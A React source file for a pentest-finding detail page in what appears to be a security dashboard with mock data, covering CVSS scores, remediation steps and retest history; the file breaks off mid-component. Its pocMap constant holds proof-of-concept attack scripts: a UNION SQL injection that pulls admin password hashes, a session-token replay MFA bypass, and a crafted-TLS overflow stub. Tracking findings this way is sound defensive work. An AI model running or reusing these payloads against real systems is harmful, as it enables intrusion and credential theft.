import { useState, useMemo } from "react";
import { useTranslation } from "react-i18next";
import { ArrowLeftIcon, TicketIcon } from "@heroicons/react/20/solid";
import {
    CheckCircleIcon,
    XCircleIcon,
    ClockIcon,
    ChevronDownIcon,
    ChevronRightIcon,
    CodeBracketIcon,
    PhotoIcon,
    ShieldCheckIcon,
    ArrowPathIcon,
    DocumentDuplicateIcon,
    CalendarDaysIcon,
    UserCircleIcon,
    LinkIcon,
    ExclamationTriangleIcon,
    InformationCircleIcon,
} from "@heroicons/react/20/solid";
import { Heading } from "src/components/base/heading";
import { Badge } from "src/components/base/badge";
import { Button } from "src/components/base/button";
import { Checkbox } from "src/components/base/checkbox";
import { Table, TableHead, TableBody, TableRow, TableHeader, TableCell } from "src/components/base/table";
import type { View, ViewContext } from "../types";
import { VIEW_LABELS, VIEW_COLORS } from "../types";
import { UNIFIED_EVENTS } from "../data/events";
import { Card, StatCard } from "../shared";
import { LocalTab, TabMenu } from "src/components/base/tab-menu";

// ---------------------------------------------------------------------------
// Types
// ---------------------------------------------------------------------------

type TabId = "overview" | "technical" | "remediation" | "history";

const severityColor = { critical: "red", high: "orange", medium: "yellow", low: "zinc" } as const;
const statusMap: Record<string, string> = {
    "PT-001": "Open",
    "PT-003": "In Progress",
    "PT-004": "In Progress",
    "PT-005": "Accepted",
    "PT-006": "Open",
};
const statusBadgeColor: Record<string, "red" | "amber" | "green" | "zinc"> = {
    Open: "red",
    "In Progress": "amber",
    Accepted: "zinc",
};
const assetMap: Record<string, string> = {
    "PT-001": "api.example.com",
    "PT-003": "AD DC-01",
    "PT-004": "lb-prod-02",
    "PT-005": "switch-floor3",
    "PT-006": "printer-3f-east",
};
const dueMap: Record<string, string> = {
    "PT-001": "2026-03-20",
    "PT-003": "2026-03-25",
    "PT-004": "2026-03-22",
    "PT-005": "—",
    "PT-006": "2026-04-01",
};

// ---------------------------------------------------------------------------
// CVSS Data
// ---------------------------------------------------------------------------

interface CvssVector {
    metric: string;
    label: string;
    value: string;
    score:
        | "High"
        | "Medium"
        | "Low"
        | "None"
        | "Network"
        | "Adjacent"
        | "Local"
        | "Physical"
        | "Required"
        | "Unchanged"
        | "Changed";
}

interface CvssData {
    score: number;
    severity: string;
    vector: string;
    components: CvssVector[];
}

const cvssMap: Record<string, CvssData> = {
    "PT-001": {
        score: 9.8,
        severity: "Critical",
        vector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        components: [
            { metric: "AV", label: "Attack Vector", value: "Network", score: "Network" },
            { metric: "AC", label: "Attack Complexity", value: "Low", score: "Low" },
            { metric: "PR", label: "Privileges Required", value: "None", score: "None" },
            { metric: "UI", label: "User Interaction", value: "None", score: "None" },
            { metric: "S", label: "Scope", value: "Unchanged", score: "Unchanged" },
            { metric: "C", label: "Confidentiality", value: "High", score: "High" },
            { metric: "I", label: "Integrity", value: "High", score: "High" },
            { metric: "A", label: "Availability", value: "High", score: "High" },
        ],
    },
    "PT-003": {
        score: 8.1,
        severity: "High",
        vector: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        components: [
            { metric: "AV", label: "Attack Vector", value: "Network", score: "Network" },
            { metric: "AC", label: "Attack Complexity", value: "Low", score: "Low" },
            { metric: "PR", label: "Privileges Required", value: "Low", score: "Low" },
            { metric: "UI", label: "User Interaction", value: "None", score: "None" },
            { metric: "S", label: "Scope", value: "Unchanged", score: "Unchanged" },
            { metric: "C", label: "Confidentiality", value: "High", score: "High" },
            { metric: "I", label: "Integrity", value: "High", score: "High" },
            { metric: "A", label: "Availability", value: "None", score: "None" },
        ],
    },
    "PT-004": {
        score: 8.6,
        severity: "High",
        vector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
        components: [
            { metric: "AV", label: "Attack Vector", value: "Network", score: "Network" },
            { metric: "AC", label: "Attack Complexity", value: "Low", score: "Low" },
            { metric: "PR", label: "Privileges Required", value: "None", score: "None" },
            { metric: "UI", label: "User Interaction", value: "None", score: "None" },
            { metric: "S", label: "Scope", value: "Changed", score: "Changed" },
            { metric: "C", label: "Confidentiality", value: "None", score: "None" },
            { metric: "I", label: "Integrity", value: "None", score: "None" },
            { metric: "A", label: "Availability", value: "High", score: "High" },
        ],
    },
    "PT-005": {
        score: 5.3,
        severity: "Medium",
        vector: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        components: [
            { metric: "AV", label: "Attack Vector", value: "Adjacent", score: "Adjacent" },
            { metric: "AC", label: "Attack Complexity", value: "Low", score: "Low" },
            { metric: "PR", label: "Privileges Required", value: "None", score: "None" },
            { metric: "UI", label: "User Interaction", value: "None", score: "None" },
            { metric: "S", label: "Scope", value: "Unchanged", score: "Unchanged" },
            { metric: "C", label: "Confidentiality", value: "High", score: "High" },
            { metric: "I", label: "Integrity", value: "None", score: "None" },
            { metric: "A", label: "Availability", value: "None", score: "None" },
        ],
    },
    "PT-006": {
        score: 3.5,
        severity: "Low",
        vector: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        components: [
            { metric: "AV", label: "Attack Vector", value: "Adjacent", score: "Adjacent" },
            { metric: "AC", label: "Attack Complexity", value: "Low", score: "Low" },
            { metric: "PR", label: "Privileges Required", value: "None", score: "None" },
            { metric: "UI", label: "User Interaction", value: "None", score: "None" },
            { metric: "S", label: "Scope", value: "Unchanged", score: "Unchanged" },
            { metric: "C", label: "Confidentiality", value: "Low", score: "Low" },
            { metric: "I", label: "Integrity", value: "None", score: "None" },
            { metric: "A", label: "Availability", value: "None", score: "None" },
        ],
    },
};

// ---------------------------------------------------------------------------
// Technical / PoC data
// ---------------------------------------------------------------------------

const technicalMap: Record<string, string> = {
    "PT-001":
        "The /api/v2/users endpoint accepts unsanitized input in the 'sort' parameter, allowing SQL injection via ORDER BY clause. UNION-based injection confirmed with full database read access.",
    "PT-003":
        "Time-based OTP bypass via session fixation. Attacker can replay intercepted session tokens within the 30-second MFA window. Affects accounts using software MFA only.",
    "PT-004":
        "CVE-2024-XXXX in OpenSSL 3.0.x allows remote code execution via crafted TLS handshake. The load balancer terminates TLS and is directly exposed to internet traffic.",
    "PT-005":
        "SNMP v2c with default community string 'public' allows full MIB enumeration. Network topology and device configuration details exposed.",
    "PT-006":
        "Network printer accessible via default admin/admin credentials. Print job queue and configuration accessible. ZTNA segmentation limits blast radius.",
};

const pocMap: Record<string, string> = {
    "PT-001": `# SQL Injection PoC - ORDER BY clause
# Target: https://api.example.com/api/v2/users

import requests

url = "https://api.example.com/api/v2/users"
headers = {"Authorization": "Bearer <token>"}

# Step 1: Confirm injection point
payload_test = "name; SELECT 1--"
r = requests.get(url, params={"sort": payload_test}, headers=headers)
print(f"Status: {r.status_code}")  # 200 = vulnerable

# Step 2: UNION-based extraction
payload_union = """name UNION SELECT
  username, password_hash, email, role, NULL
  FROM admin_users--"""
r = requests.get(url, params={"sort": payload_union}, headers=headers)

# Step 3: Verify data exfiltration
for user in r.json()["data"]:
    print(f"  {user['username']}: {user['email']}")

# Impact: Full read access to all database tables
# including admin_users, sessions, api_keys`,

    "PT-003": `# MFA Bypass PoC - Session Token Replay
# Target: AD DC-01 (Active Directory)

import requests, time

login_url = "https://dc-01.corp.local/auth/login"
mfa_url = "https://dc-01.corp.local/auth/mfa/verify"

# Step 1: Authenticate with valid credentials
session = requests.Session()
r = session.post(login_url, json={
    "username": "admin",
    "password": "<intercepted_password>"
})
pre_mfa_token = r.cookies["session_token"]

# Step 2: Wait for legitimate user to complete MFA
# (Token remains valid for 30-second window)
time.sleep(25)

# Step 3: Replay pre-MFA session token
session.cookies.set("session_token", pre_mfa_token)
r = session.get("https://dc-01.corp.local/admin/dashboard")
print(f"Access: {r.status_code}")  # 200 = MFA bypassed`,

    "PT-004": `# OpenSSL RCE PoC - Crafted TLS Handshake
# Target: lb-prod-02 (Load Balancer)
# CVE: CVE-2024-XXXX

from scapy.all import *
import struct

target = "lb-prod-02.example.com"
port = 443

# Step 1: Craft malicious ClientHello
client_hello = TLS(
    msg=[TLSClientHello(
        ciphers=[0x1301],
        ext=[
            TLS_Ext_SupportedVersions(versions=[0x0304]),
            TLS_Ext_ServerName(
                servernames=[ServerName(
                    # Overflow in SNI parsing
                    servername=b"A" * 65536
                )]
            )
        ]
    )]
)

# Step 2: Send and trigger overflow
sock = socket.socket()
sock.connect((target, port))
sock.send(bytes(client_hello))

# Step 3: Verify crash / code execution
response = sock.recv(4096)
print(f"Response length: {len(response)}")`,
};

// ---------------------------------------------------------------------------
// Remediation data
// ---------------------------------------------------------------------------

interface RemediationStep {
    id: string;
    title: string;
    description: string;
    assignee: string;
    dueDate: string;
    completed: boolean;
    priority: "critical" | "high" | "medium" | "low";
}

const remediationStepsMap: Record<string, RemediationStep[]> = {
    "PT-001": [
        {
            id: "rem-1",
            title: "Implement parameterized queries",
            description: "Replace all string-concatenated SQL with parameterized queries in the /api/v2/users endpoint",
            assignee: "Backend Team",
            dueDate: "2026-03-18",
            completed: false,
            priority: "critical",
        },
        {
            id: "rem-2",
            title: "Deploy WAF rule",
            description: "Deploy ModSecurity rule to block SQL injection patterns as interim mitigation",
            assignee: "SecOps",
            dueDate: "2026-03-15",
            completed: true,
            priority: "critical",
        },
        {
            id: "rem-3",
            title: "Code review all API endpoints",
            description: "Conduct comprehensive code review of all API endpoints for injection vulnerabilities",
            assignee: "Security Team",
            dueDate: "2026-03-25",
            completed: false,
            priority: "high",
        },
        {
            id: "rem-4",
            title: "Add input validation layer",
            description: "Implement centralized input validation/sanitization middleware",
            assignee: "Backend Team",
            dueDate: "2026-03-28",
            completed: false,
            priority: "high",
        },
        {
            id: "rem-5",
            title: "Update SAST rules",
            description: "Update static analysis rules to catch ORDER BY injection patterns",
            assignee: "DevSecOps",
            dueDate: "2026-03-30",
            completed: false,
            priority: "medium",
        },
    ],
    "PT-003": [
        {
            id: "rem-1",
            title: "Enforce hardware MFA tokens",
            description: "Require hardware tokens for all privileged accounts",
            assignee: "IT Admin",
            dueDate: "2026-03-20",
            completed: true,
            priority: "critical",
        },
        {
            id: "rem-2",
            title: "Update ZTNA policy",
            description: "Update ZTNA policy to require hardware authentication for admin access",
            assignee: "SecOps",
            dueDate: "2026-03-22",
            completed: true,
            priority: "high",
        },
        {
            id: "rem-3",
            title: "Audit privileged accounts",
            description: "Audit all privileged account access logs for the past 90 days",
            assignee: "SOC Team",
            dueDate: "2026-03-25",
            completed: false,
            priority: "high",
        },
    ],
    "PT-004": [
        {
            id: "rem-1",
            title: "Apply OpenSSL patch",
            description: "Apply security patch to lb-prod-02 during maintenance window",
            assignee: "Infrastructure",
            dueDate: "2026-03-18",
            completed: false,
            priority: "critical",
        },
        {
            id: "rem-2",
            title: "Test patch in staging",
            description: "Deploy and verify patch in staging environment first",
            assignee: "QA Team",
            dueDate: "2026-03-16",
            completed: true,
            priority: "high",
        },
        {
            id: "rem-3",
            title: "Schedule maintenance window",
            description: "Coordinate with operations for production patching window",
            assignee: "Operations",
            dueDate: "2026-03-17",
            completed: false,
            priority: "high",
        },
    ],
    "PT-005": [
        {
            id: "rem-1",
            title: "Disable SNMP v2c",
            description: "Disable SNMP v2c and configure v3 with authentication and encryption",
            assignee: "Network Team",
            dueDate: "2026-04-01",
            completed: false,
            priority: "medium",
        },
        {
            id: "rem-2",
            title: "Update community strings",
            description: "If v2c must remain, update community strings to complex non-default values",
            assignee: "Network Team",
            dueDate: "2026-03-25",
            completed: false,
            priority: "medium",
        },
    ],
    "PT-006": [
        {
            id: "rem-1",
            title: "Rotate default credentials",
            description: "Change admin/admin credentials on printer-3f-east",
            assignee: "IT Support",
            dueDate: "2026-03-20",
            completed: false,
            priority: "low",
        },
        {
            id: "rem-2",
            title: "Implement credential policy",
            description: "Create and enforce credential management policy for IoT/printer devices",
            assignee: "IT Admin",
            dueDate: "2026-04-15",
            completed: false,
            priority: "low",
        },
    ],
};

// ---------------------------------------------------------------------------
// History data
// ---------------------------------------------------------------------------

interface RetestEntry {
    id: string;
    date: string;
    tester: string;
    result: "pass" | "fail" | "partial";
    notes: string;
    version: string;
}

interface SimilarFinding {
    id: string;
    title: string;
    pentest: string;
    severity: "critical" | "high" | "medium" | "low";
    status: string;
    date: string;
}

const retestMap: Record<string, RetestEntry[]> = {
    "PT-001": [
        {
            id: "rt-1",
            date: "2026-03-10",
            tester: "s.braun",
            result: "fail",
            notes: "WAF rule deployed but underlying code still vulnerable",
            version: "v2.3.1",
        },
        {
            id: "rt-2",
            date: "2026-02-15",
            tester: "j.mueller",
            result: "fail",
            notes: "Initial finding confirmed, UNION injection works",
            version: "v2.3.0",
        },
    ],
    "PT-003": [
        {
            id: "rt-1",
            date: "2026-03-08",
            tester: "s.braun",
            result: "partial",
            notes: "Hardware tokens enforced for Tier 1 admins, software MFA still allowed for Tier 2",
            version: "AD 2022",
        },
        {
            id: "rt-2",
            date: "2026-02-20",
            tester: "m.mustermann",
            result: "fail",
            notes: "Session replay still possible within 30s window",
            version: "AD 2022",
        },
    ],
    "PT-004": [
        {
            id: "rt-1",
            date: "2026-03-05",
            tester: "j.mueller",
            result: "fail",
            notes: "Patch not yet applied, staging test successful",
            version: "OpenSSL 3.0.12",
        },
    ],
};

const similarFindingsMap: Record<string, SimilarFinding[]> = {
    "PT-001": [
        {
            id: "PT-2025-042",
            title: "Blind SQL Injection - /api/v1/reports",
            pentest: "Q3 2025 Assessment",
            severity: "critical",
            status: "Remediated",
            date: "2025-09-15",
        },
        {
            id: "PT-2025-018",
            title: "SQL Injection - search endpoint",
            pentest: "Q2 2025 Assessment",
            severity: "high",
            status: "Remediated",
            date: "2025-06-20",
        },
        {
            id: "PT-2024-067",
            title: "NoSQL Injection - MongoDB query",
            pentest: "Q4 2024 Assessment",
            severity: "high",
            status: "Remediated",
            date: "2024-12-10",
        },
    ],
    "PT-003": [
        {
            id: "PT-2025-031",
            title: "MFA bypass via recovery codes",
            pentest: "Q3 2025 Assessment",
            severity: "high",
            status: "Remediated",
            date: "2025-08-22",
        },
    ],
    "PT-004": [
        {
            id: "PT-2025-055",
            title: "OpenSSL heap overflow - proxy-01",
            pentest: "Q4 2025 Assessment",
            severity: "high",
            status: "Remediated",
            date: "2025-11-30",
        },
    ],
};

// Compliance mapping
const complianceMap: Record<
    string,
    { standard: string; control: string; color: "red" | "blue" | "purple" | "green" | "orange" }[]
> = {
    "PT-001": [
        { standard: "PCI-DSS", control: "6.5.1", color: "red" },
        { standard: "ISO 27001", control: "A.14.2.5", color: "blue" },
        { standard: "SOC2", control: "CC6.1", color: "purple" },
        { standard: "OWASP", control: "A03:2021", color: "orange" },
    ],
    "PT-003": [
        { standard: "PCI-DSS", control: "8.3.1", color: "red" },
        { standard: "ISO 27001", control: "A.9.4.2", color: "blue" },
        { standard: "NIST", control: "IA-2(6)", color: "green" },
    ],
    "PT-004": [
        { standard: "PCI-DSS", control: "6.2", color: "red" },
        { standard: "ISO 27001", control: "A.12.6.1", color: "blue" },
        { standard: "SOC2", control: "CC7.1", color: "purple" },
    ],
    "PT-005": [
        { standard: "ISO 27001", control: "A.13.1.1", color: "blue" },
        { standard: "NIST", control: "CM-7", color: "green" },
    ],
    "PT-006": [
        { standard: "ISO 27001", control: "A.9.2.3", color: "blue" },
        { standard: "NIST", control: "IA-5", color: "green" },
    ],
};

// Screenshot placeholders
const screenshotMap: Record<string, { name: string; description: string }[]> = {
    "PT-001": [
        {
            name: "sqli_burp_intercept.png",
            description: "Burp Suite intercept showing injected payload in sort parameter",
        },
        { name: "sqli_data_exfil.png", description: "Extracted admin user table via UNION injection" },
        { name: "sqli_error_based.png", description: "Database error message revealing table structure" },
    ],
    "PT-003": [
        {
            name: "mfa_bypass_session.png",
            description: "Session token replay showing successful authentication bypass",
        },
        { name: "mfa_timeline.png", description: "Timeline showing 30-second replay window" },
    ],
    "PT-004": [
        { name: "openssl_crash.png", description: "Load balancer crash dump after crafted TLS handshake" },
        { name: "openssl_version.png", description: "Vulnerable OpenSSL version identification" },
    ],
};

// ---------------------------------------------------------------------------
// Sub-components
// ---------------------------------------------------------------------------

function CvssCircle({ score }: { score: number }) {
    const circumference = 2 * Math.PI * 42;
    const dashOffset = circumference - (score / 10) * circumference;
    const color = score >= 9.0 ? "#ef4444" : score >= 7.0 ? "#f97316" : score >= 4.0 ? "#eab308" : "#22c55e";

    return (
        <div className="flex flex-col items-center">
            <svg width="110" height="110" viewBox="0 0 110 110" className="drop-shadow-md">
                <circle
                    cx="55"
                    cy="55"
                    r="42"
                    fill="none"
                    stroke="currentColor"
                    strokeWidth="7"
                    className="text-zinc-200 dark:text-zinc-700"
                />
                <circle
                    cx="55"
                    cy="55"
                    r="42"
                    fill="none"
                    stroke={color}
                    strokeWidth="7"
                    strokeLinecap="round"
                    strokeDasharray={circumference}
                    strokeDashoffset={dashOffset}
                    transform="rotate(-90 55 55)"
                    className="transition-all duration-1000 ease-out"
                />
                <text
                    x="55"
                    y="50"
                    textAnchor="middle"
                    className="fill-zinc-900 dark:fill-white"
                    fontSize="26"
                    fontWeight="800"
                >
                    {score.toFixed(1)}
                </text>
                <text x="55" y="70" textAnchor="middle" className="fill-zinc-500" fontSize="10">
                    /10.0
                </text>
            </svg>
        </div>
    );
}

// ---------------------------------------------------------------------------
// Main component
// ---------------------------------------------------------------------------

export function PentestFindingDetailView({
    findingId,
    onNavigate,
    onNavigateDetail,
}: {
    findingId: string;
    onNavigate: (v: View) => void;
    onNavigateDetail: (ctx: ViewContext) => void;
}) {
    const { t } = useTranslation();
    const event = UNIFIED_EVENTS.find((e) => e.id === findingId);

    const [activeTab, setActiveTab] = useState<TabId>("overview");
    const [remediationSteps, setRemediationSteps] = useState<Record<string, RemediationStep[]>>(remediationStepsMap);
    const [expandedPoc, setExpandedPoc] = useState(false);

    if (!event) {
        return (
            <div>
                <Button plain onClick={() => onNavigate("pentests")}>
                    <ArrowLeftIcon className="h-4 w-4" />
                    {t("pentestDetail.back")}
                </Button>
                <p className="mt-8 text-zinc-500">{t("pentestDetail.notFound")}</p>
            </div>
        );
    }

    const status = statusMap[event.id] ?? "Open";
    const cvss = cvssMap[event.id];
    const correlatedEvents = UNIFIED_EVENTS.filter(
        (e) => e.id !== event.id && (event.correlated.includes(e.system) || e.correlated.includes(event.system)),
    );
    const currentRemSteps = remediationSteps[event.id] ?? [];
    const retests = retestMap[event.id] ?? [];
    const similarFindings = similarFindingsMap[event.id] ?? [];
    const compliance = complianceMap[event.id] ?? [];
    const screenshots = screenshotMap[event.id] ?? [];
    const poc = pocMap[event.id];

    const remediationProgress = useMemo(() => {
        if (currentRemSteps.length === 0) return 0;
        return Math.round((currentRemSteps.filter((s) => s.completed).length / currentRemSteps.length) * 100);
    }, [currentRemSteps]);

    const toggleRemediationStep = (stepId: string) => {
        setRemediationSteps((prev) => ({
            ...prev,
            [event.id]: (prev[event.id] ?? []).map((s) => (s.id === stepId ? { ...s, completed: !s.completed } : s)),
        }));
    };

    const cvssComponentColor = (value: string) => {
        const highValues = ["High", "Network", "Changed"];
        const medValues = ["Medium", "Adjacent", "Low"];
        const lowValues = ["None", "Local", "Physical", "Unchanged", "Required"];
        if (highValues.includes(value)) return "red";
        if (medValues.includes(value)) return "orange";
        return "green";
    };

    return (
        <>
            {/* Back button */}
            <Button plain onClick={() => onNavigate("pentests")}>
                <ArrowLeftIcon className="h-4 w-4" />
                {t("pentestDetail.back")}
            </Button>

            {/* Header */}
            <div className="mt-4 flex flex-wrap items-center gap-3">
                <span className="font-mono text-sm text-zinc-400">{event.id}</span>
                <Heading>{event.title}</Heading>
            </div>
            <div className="mt-2 flex flex-wrap gap-2">
                <Badge color={severityColor[event.severity]}>{event.severity.toUpperCase()}</Badge>
                <Badge color={statusBadgeColor[status] ?? "zinc"}>{status}</Badge>
                {compliance.map((c) => (
                    <Badge key={c.standard + c.control} color={c.color}>
                        {c.standard} {c.control}
                    </Badge>
                ))}
            </div>

            {/* Tabs */}
            <div className="mt-6">
                <TabMenu>
                    <LocalTab active={activeTab === "overview"} onClick={() => setActiveTab("overview")}>
                        Overview
                    </LocalTab>
                    <LocalTab active={activeTab === "technical"} onClick={() => setActiveTab("technical")}>
                        Technical
                    </LocalTab>
                    <LocalTab active={activeTab === "remediation"} onClick={() => setActiveTab("remediation")}>
                        Remediation
                    </LocalTab>
                    <LocalTab active={activeTab === "history"} onClick={() => setActiveTab("history")}>
                        History
                    </LocalTab>
                </TabMenu>
            </div>

            {/* ============================================================ */}
            {/* OVERVIEW TAB                                                 */}
            {/* ============================================================ */}
            {activeTab === "overview" && (
                <div className="mt-6 space-y-6">
                    <div className="grid gap-6 lg:grid-cols-3">
                        {/* Description */}
                        <Card className="lg:col-span-2">
                            <h3 className="text-sm font-semibold text-zinc-900 dark:text-white">
                                {t("pentestDetail.description")}
                            </h3>
                            <p className="mt-2 text-sm leading-relaxed text-zinc-600 dark:text-zinc-400">
                                {event.details}
                            </p>

                            {/* Remediation progress summary */}
                            <div className="mt-6 rounded-lg border border-zinc-200/60 p-4 dark:border-zinc-700/40">
                                <div className="flex items-center justify-between">
                                    <span className="text-sm font-medium text-zinc-700 dark:text-zinc-300">
                                        Remediation Progress
                                    </span>
                                    <span className="text-sm font-semibold text-zinc-900 dark:text-white">
                                        {remediationProgress}%
                                    </span>
                                </div>
                                <div className="mt-2 h-2 overflow-hidden rounded-full bg-zinc-200 dark:bg-zinc-700">
                                    <div
                                        className={`h-full rounded-full transition-all duration-500 ${remediationProgress === 100 ? "bg-green-500" : remediationProgress > 50 ? "bg-blue-500" : "bg-orange-500"}`}
                                        style={{ width: `${remediationProgress}%` }}
                                    />
                                </div>
                                <p className="mt-1 text-xs text-zinc-400">
                                    {currentRemSteps.filter((s) => s.completed).length} of {currentRemSteps.length}{" "}
                                    steps completed
                                </p>
                            </div>
                        </Card>

                        {/* CVSS Score */}
                        <Card>
                            <h3 className="mb-4 text-sm font-semibold text-zinc-900 dark:text-white">CVSS Score</h3>
                            {cvss ? (
                                <div className="flex flex-col items-center gap-4">
                                    <CvssCircle score={cvss.score} />
                                    <Badge
                                        color={
                                            cvss.score >= 9
                                                ? "red"
                                                : cvss.score >= 7
                                                  ? "orange"
                                                  : cvss.score >= 4
                                                    ? "yellow"
                                                    : "green"
                                        }
                                    >
                                        {cvss.severity}
                                    </Badge>
                                    <p className="break-all text-center font-mono text-[10px] text-zinc-400">
                                        {cvss.vector}
                                    </p>
                                </div>
                            ) : (
                                <p className="text-sm text-zinc-500">No CVSS data available</p>
                            )}
                        </Card>
                    </div>

                    {/* Asset info + correlated systems */}
                    <div className="grid gap-6 lg:grid-cols-2">
                        <Card>
                            <h3 className="text-sm font-semibold text-zinc-900 dark:text-white">
                                {t("pentestDetail.assetInfo")}
                            </h3>
                            <dl className="mt-3 space-y-2 text-sm">
                                <div className="flex justify-between">
                                    <dt className="text-zinc-500">{t("pentests.asset")}</dt>
                                    <dd className="font-mono text-zinc-900 dark:text-white">
                                        {assetMap[event.id] ?? "—"}
                                    </dd>
                                </div>
                                <div className="flex justify-between">
                                    <dt className="text-zinc-500">{t("pentests.due")}</dt>
                                    <dd className="font-mono text-zinc-900 dark:text-white">
                                        {dueMap[event.id] ?? "—"}
                                    </dd>
                                </div>
                                <div className="flex justify-between">
                                    <dt className="text-zinc-500">{t("pentests.status")}</dt>
                                    <dd>
                                        <Badge color={statusBadgeColor[status] ?? "zinc"}>{status}</Badge>
                                    </dd>
                                </div>
                            </dl>
                        </Card>
                        <Card>
                            <h3 className="text-sm font-semibold text-zinc-900 dark:text-white">
                                {t("pentestDetail.correlatedSystems")}
                            </h3>
                            <div className="mt-3 flex flex-wrap gap-2">
                                {event.correlated.map((sys) => (
                                    <button key={sys} onClick={() => onNavigate(sys)}>
                                        <Badge color={VIEW_COLORS[sys]}>{VIEW_LABELS[sys]}</Badge>
                                    </button>
                                ))}
                            </div>
                        </Card>
                    </div>

                    {/* Correlated events */}
                    {correlatedEvents.length > 0 && (
                        <Card>
                            <h3 className="text-sm font-semibold text-zinc-900 dark:text-white">
                                {t("pentestDetail.correlatedEvents")} ({correlatedEvents.length})
                            </h3>
                            <div className="mt-4 space-y-0">
                                {correlatedEvents.map((re) => (
                                    <div
                                        key={re.id}
                                        className="relative border-l-2 border-blue-200/60 py-3 pl-5 dark:border-blue-800/60"
                                    >
                                        <div className="absolute -left-[5px] top-4 h-2.5 w-2.5 rounded-full bg-blue-400 shadow-sm shadow-blue-400/50" />
                                        <div className="flex items-center gap-2">
                                            <Badge color={VIEW_COLORS[re.system]}>{VIEW_LABELS[re.system]}</Badge>
                                            <span className="font-mono text-xs text-zinc-400">{re.id}</span>
                                            <span className="font-mono text-xs text-zinc-400">{re.time}</span>
                                        </div>
                                        <p className="mt-1 text-sm font-medium text-zinc-700 dark:text-zinc-300">
                                            {re.title}
                                        </p>
                                    </div>
                                ))}
                            </div>
                        </Card>
                    )}
                </div>
            )}

            {/* ============================================================ */}
            {/* TECHNICAL TAB                                                */}
            {/* ============================================================ */}
            {activeTab === "technical" && (
                <div className="mt-6 space-y-6">
                    {/* Technical details */}
                    {technicalMap[event.id] && (
                        <Card>
                            <h3 className="text-sm font-semibold text-zinc-900 dark:text-white">
                                {t("pentestDetail.technicalDetails")}
                            </h3>
                            <p className="mt-2 font-mono text-xs leading-relaxed text-zinc-600 dark:text-zinc-400">
                                {technicalMap[event.id]}
                            </p>
                        </Card>
                    )}

                    {/* CVSS Vector Breakdown */}
                    {cvss && (
                        <Card>
                            <h3 className="mb-4 text-sm font-semibold text-zinc-900 dark:text-white">
                                CVSS Vector Breakdown
                            </h3>
                            <div className="grid gap-2 sm:grid-cols-2 lg:grid-cols-4">
                                {cvss.components.map((comp) => (
                                    <div
                                        key={comp.metric}
                                        className="rounded-lg border border-zinc-200/60 p-3 dark:border-zinc-700/40"
                                    >
                                        <div className="flex items-center justify-between">
                                            <span className="text-[10px] font-semibold uppercase tracking-wider text-zinc-400">
                                                {comp.metric}
                                            </span>
                                            <Badge color={cvssComponentColor(comp.value)}>{comp.value}</Badge>
                                        </div>
                                        <p className="mt-1 text-xs text-zinc-600 dark:text-zinc-300">{comp.label}</p>
                                    </div>
                                ))}
                            </div>
                        </Card>
                    )}

                    {/* Proof of Concept */}
                    {poc && (
                        <Card>
                            <div className="flex items-center justify-between">
                                <div className="flex items-center gap-2">
                                    <CodeBracketIcon className="h-5 w-5 text-blue-500" />
                                    <h3 className="text-sm font-semibold text-zinc-900 dark:text-white">
                                        Proof of Concept
                                    </h3>
                                </div>
                                <div className="flex gap-2">
                                    <Button plain onClick={() => setExpandedPoc(!expandedPoc)}>
                                        {expandedPoc ? (
                                            <ChevronDownIcon className="h-4 w-4" />
                                        ) : (
                                            <ChevronRightIcon className="h-4 w-4" />
                                        )}
                                        {expandedPoc ? "Collapse" : "Expand"}
                                    </Button>
                                    <Button plain>
                                        <DocumentDuplicateIcon className="h-4 w-4" />
                                        Copy
                                    </Button>
                                </div>
                            </div>
                            <div className="mt-2 flex items-center gap-2 rounded-lg border border-red-200 bg-red-50/50 p-2 dark:border-red-900/50 dark:bg-red-950/20">
                                <ExclamationTriangleIcon className="h-4 w-4 shrink-0 text-red-500" />
                                <span className="text-[10px] text-red-700 dark:text-red-300">
                                    This PoC is for authorized testing only. Unauthorized use is prohibited.
                                </span>
                            </div>
                            {expandedPoc && (
                                <pre className="mt-3 overflow-x-auto rounded-lg bg-zinc-950 p-4 font-mono text-xs leading-relaxed text-green-400">
                                    {poc}
                                </pre>
                            )}
                            {!expandedPoc && (
                                <pre className="mt-3 max-h-24 overflow-hidden rounded-lg bg-zinc-950 p-4 font-mono text-xs leading-relaxed text-green-400">
                                    {poc.split("\n").slice(0, 5).join("\n")}
                                    {"\n..."}
                                </pre>
                            )}
                        </Card>
                    )}

                    {/* Screenshots */}
                    {screenshots.length > 0 && (
                        <Card>
                            <div className="flex items-center gap-2">
                                <PhotoIcon className="h-5 w-5 text-blue-500" />
                                <h3 className="text-sm font-semibold text-zinc-900 dark:text-white">
                                    Evidence Screenshots ({screenshots.length})
                                </h3>
                            </div>
                            <div className="mt-4 grid gap-4 sm:grid-cols-2 lg:grid-cols-3">
                                {screenshots.map((ss, i) => (
                                    <div
                                        key={i}
                                        className="group overflow-hidden rounded-lg border border-zinc-200/60 dark:border-zinc-700/40"
                                    >
                                        {/* Placeholder image */}
                                        <div className="flex h-36 items-center justify-center bg-gradient-to-br from-zinc-100 to-zinc-200 dark:from-zinc-800 dark:to-zinc-900">
                                            <div className="flex flex-col items-center gap-2">
                                                <PhotoIcon className="h-8 w-8 text-zinc-300 dark:text-zinc-600" />
                                                <span className="font-mono text-[10px] text-zinc-400">{ss.name}</span>
                                            </div>
                                        </div>
                                        <div className="p-2">
                                            <p className="text-xs text-zinc-500">{ss.description}</p>
                                        </div>
                                    </div>
                                ))}
                            </div>
                        </Card>
                    )}
                </div>
            )}

            {/* ============================================================ */}
            {/* REMEDIATION TAB                                              */}
            {/* ============================================================ */}
            {activeTab === "remediation" && (
                <div className="mt-6 space-y-6">
                    {/* Progress stats */}
                    <div className="grid gap-4 sm:grid-cols-3">
                        <StatCard label="Remediation Progress" value={`${remediationProgress}%`} />
                        <StatCard
                            label="Steps Completed"
                            value={`${currentRemSteps.filter((s) => s.completed).length}/${currentRemSteps.length}`}
                        />
                        <StatCard label="Due Date" value={dueMap[event.id] ?? "—"} />
                    </div>

                    {/* Remediation checklist */}
                    <Card>
                        <h3 className="mb-4 text-sm font-semibold text-zinc-900 dark:text-white">Remediation Steps</h3>
                        <div className="space-y-3">
                            {currentRemSteps.map((step) => (
                                <div
                                    key={step.id}
